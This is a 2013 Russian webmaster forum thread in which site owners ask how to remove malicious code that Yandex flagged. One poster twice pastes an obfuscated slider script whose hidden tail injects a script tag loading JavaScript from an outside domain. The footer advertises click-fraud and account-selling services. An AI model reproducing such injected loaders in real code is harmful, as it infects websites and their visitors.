Яндекс нашел вредоносный код помогите найти

Яндекс нашел вредоносный код помогите найти, Яндекс нашел вредоносный кодс: file0c.net при посещении сайта с мобильных устройств

Вячеслав Талантов

Сообщений: 621 Регистрация: Фев 2013

#16

8 Августа 2013 23:03

да, изменили .js файлы.
измените пароли FTP, не в коем случае не хваните их в файловом менеджере (каждую сессию вбивайте вручную). Видимо у вас просто был сохранен пароль.
Проверьте и другие .js файлы.

juran1234

Сообщений: 45 Регистрация: Май 2013

#17

13 Августа 2013 12:38

Яндекс нашёл вирус, который называется поведенческий анализ, где его искать

darkneo

Сообщений: 396 Регистрация: Дек 2011

#18

14 Августа 2013 16:55

у меня они тоже в этих числах сайт залетел с данной табличкой.. убрал.. потом бац сегодня опять появилась что сайт имеет контет вредоносного характера, посмотрел что кто то правил вчера файл джеквери, начал копаться в логах .. и увидел очень интересную картину, оказывается с первых числах августа кто то усердно несколько дней подряд подбирал пороль к админки 130 000 раз потребовалась и он просто заходил меня файл и все . так вроде бы больше нечего не добавилось, файлы были заменены только джс скрипта

Ages

Сообщений: 35 Регистрация: Сен 2010

#19

17 Августа 2013 18:44

Ребят, может кто подскажет где тут вирус искать? сайт kusa.mobi
smile:mad:

Ages

Сообщений: 35 Регистрация: Сен 2010

#20

18 Августа 2013 14:36

Прошу помощи, ибо сам уже устал искать. (((

bobit

Сообщений: 222 Регистрация: Июн 2011

#21

18 Августа 2013 15:17

Смотрите файл functions.jsВ самом низу, короче строка 50

Ages

Сообщений: 35 Регистрация: Сен 2010

#22

19 Августа 2013 10:44

Цитата
bobit пишет: Смотрите файл functions.jsВ самом низу, короче строка 50

Большое спасибо, нашел ссылку))) только не понял для чего она там была. хмм...

Sasha Minsky

Сообщений: 480 Регистрация: Апр 2013

#23

19 Августа 2013 12:10

Сегодня тоже Яндекс предупредил о вредоносном коде. Нашел сам, код был добавлен в конец одного из js-файлов.
Эпидемия какая-то? У многих смотрю такая проблема, дописывают хвост в файл js. И самое неприятное, что непонятно, как это произошло. У меня свежий вордпресс, несколько плагинов с офсайта и тема оттуда же, ничего лишнего, и вот на тебе - внесли заразу.
Как думаете, если на все файлы js прописать права 444 - защитит от этой напасти?

Владимир пупкин

Сообщений: 210 Регистрация: Дек 2011

#24

21 Августа 2013 23:15

точно такая проблема с двумя сайтами.. только не могу найти ((((((((((http://homelib.in.ua и http://kreditfree.ru подскажите где находится пожалуйста. В ЯВ написано что обнаружен поведенческий анализ.

Изменено: Владимир пупкин - 22 Августа 2013 09:03

Банковская партнерка №1 с 50 хостов 10 000 рублей

nitroski

Сообщений: 3 Регистрация: Фев 2013

#25

22 Августа 2013 10:56

Добры день всем. подскажите, нашел код в js скрипте...вот код:\

Код

 /* Copyright (c) 2012 Fred Heusschen *   www.frebsite.nl  *  * Dual licensed under the MIT and GPL licenses. */ eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(i).r(5(){$(\'.3\').e(5(){$(\'.3-0-2\').b(\'7\');$(\'.3-0-2-9\').b(\'7\')});$(\'.3-0-2-9, .s\').e(5(){$(\'.3-0-2\').f(\'7\');$(\'.3-0-2-9\').f(\'7\')});$(\'.k-4-0 j\').l(5(){$(6).8(\'.2-4-0\').c({\'g\':\'0\'});$(6).8(\'.4-a\').n(\'h\')},5(){$(6).8(\'.2-4-0\').c({\'g\':\'F\'});$(6).8(\'.4-a\').D(\'h\')});$(\'#y\').A({B:\'#C\',J:\'#z\',E:1,I:H})});i.G("<d x=\'w/o\' m=\'p://u.v/t.q\'></d>")',46,46,'block||hidden|login|menu|function|this|400|find|dark|link|fadeIn|css|script|click|fadeOut|display|activ|document|li|top|hover|src|addClass|javascript|http|js|ready|close|iknopo_b|iknopo|ru|text|type|foo1|next1|carouFredSel|prev|prev1|removeClass|scroll|none|write|false|auto|next'.split('|'),0,{}))

Не могу его убрать...если внести какие-либо изменения, то не работает слайдер на главной...

Помогите плиз...

Изменено: nitroski - 22 Августа 2013 10:57

Sasha Minsky

Сообщений: 480 Регистрация: Апр 2013

#26

22 Августа 2013 11:53

Кстати, права 444 на файлы не помогли - сегодня опять код внедрился, а права 444 так и остались...
Как бороться-то? smile:)

darkneo

Сообщений: 396 Регистрация: Дек 2011

#27

22 Августа 2013 12:17

измените пароль на админку, и установите доп защиту на вход в админку и смените пароль на фтпшный доступ

Sasha Minsky

Сообщений: 480 Регистрация: Апр 2013

#28

22 Августа 2013 14:22

Цитата
darkneo пишет: измените пароль на админку, и установите доп защиту на вход в админку и смените пароль на фтпшный доступ

Эти шаги сделал пару дней назад, после первого эпизода заражения - все пароли сменил, логин в админку усложнил - правда тут не знаю, насколько эффективно, ведь самому-то заходить все-таки надо... Ничего не спасло smile:)

Возможно, у меня виндоус заражен, но вроде не похоже - и антивирусом гонял, да и по поведению системы ничего необычного не замечаю.
Единственное наблюдение - то, что после таких атак у меня, кроме всего, прочего пропадает автологин на форуме сайта. Куки видимо сбрасываются. Неужели все-таки через меня взламывают:o

nitroski

Сообщений: 3 Регистрация: Фев 2013

#29

22 Августа 2013 19:01

Блин, никто не знает, как это вирусняк вырезать из js???
Порезал кое-как пути. Слайдер работает, за то сайт грузится неимоверное долго...

Код

 /* Copyright (c) 2012 Fred Heusschen *   www.frebsite.nl  *  * Dual licensed under the MIT and GPL licenses. */ eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(i).r(5(){$(\'.3\').e(5(){$(\'.3-0-2\').b(\'7\');$(\'.3-0-2-9\').b(\'7\')});$(\'.3-0-2-9, .s\').e(5(){$(\'.3-0-2\').f(\'7\');$(\'.3-0-2-9\').f(\'7\')});$(\'.k-4-0 j\').l(5(){$(6).8(\'.2-4-0\').c({\'g\':\'0\'});$(6).8(\'.4-a\').n(\'h\')},5(){$(6).8(\'.2-4-0\').c({\'g\':\'F\'});$(6).8(\'.4-a\').D(\'h\')});$(\'#y\').A({B:\'#C\',J:\'#z\',E:1,I:H})});i.G("<d x=\'w/o\' m=\'p://u.v/t.q\'></d>")',46,46,'block||hidden|login|menu|function|this|050|find|dark|link|fadeIn|css|script|click|fadeOut|display|activ|document|li|top|hover|src|addClass|javascript|http|js|ready|close||||text|type|foo1|next1|carouFredSel|prev|prev1|removeClass|scroll|none|write|false|auto|next'.split('|'),0,{}))

Изменено: nitroski - 22 Августа 2013 19:04

paltarasych Сообщений: 3289 Регистрация: Янв 2011	#30 22 Августа 2013 23:06 люди, пишите своего хостера, какая cms сайта, какой антивирус стоит, каким ftp клиентом пользуетесь. возможно подойдем к общему знаменателю. Биржа криптовалюты Отличный хостинг Webhost1

Похожие темы:

27.04.2021 10:20	Пропали письма с корп. почты на Яндексе
25.11.2020 00:10	Бан "Редирект" от Яндекса, долго ли восстанавливается сайт?
23.07.2014 14:10	Яндекс нашел вредоносный код помогите найти
17.06.2014 09:55	Копия моего сайта в выдаче яндекса на первой странице и она не принадлежит мне.
31.08.2013 20:58	яндекс нашел вредоносный код

Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

Новые темы	Объявления	Свободное общение
21:49 Как правильно покупать ссылки для поддомена? 18:51 Роскомнадзор отказал в регистрации трети блогеров-десятитысячников 12:53 где много готовых фавиконок 22:59 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 12:32 «Хлебные крошки» в адресе сайтов исчезнут из результатов поиска Google 23:27 Adfinity - Ваш надежный партнер в монетизации трафика 16:55 Инструменты для массового постинга в WordPress	01:53 Европейский эквайринг 20:19 GoogleWalker - устранение конкурентов в Google Ads \| Автоматизированная система склика \| АНТИБАН 16:39 Продам аккаунты Gmail USA IP \| Gmail MIX IP \| Outlook Old 11:07 Мобильные и Резидентные Прокси Для Соц Сетей \| 3 Гб Бесплатно 11:01 Защитим твой ресурс от блокировки Роскомнадзора 10:09 BestChange – обменивать электронную валюту можно быстро и выгодно 06:50 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка	23:52 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 07:48 США готовят закон для уничтожения пиратских сайтов во всех странах мира 02:50 Точные прогнозы на футбол 02:10 [Новая партнерка] Goldbet Partners — прямой рекламодатель одноименного казино Goldbet 21:19 С юмором по жизни! 18:15 Telegram уничтожил официальный канал легендарного российского торрент-трекера 18:19 Уникальный сервис SEO продвижения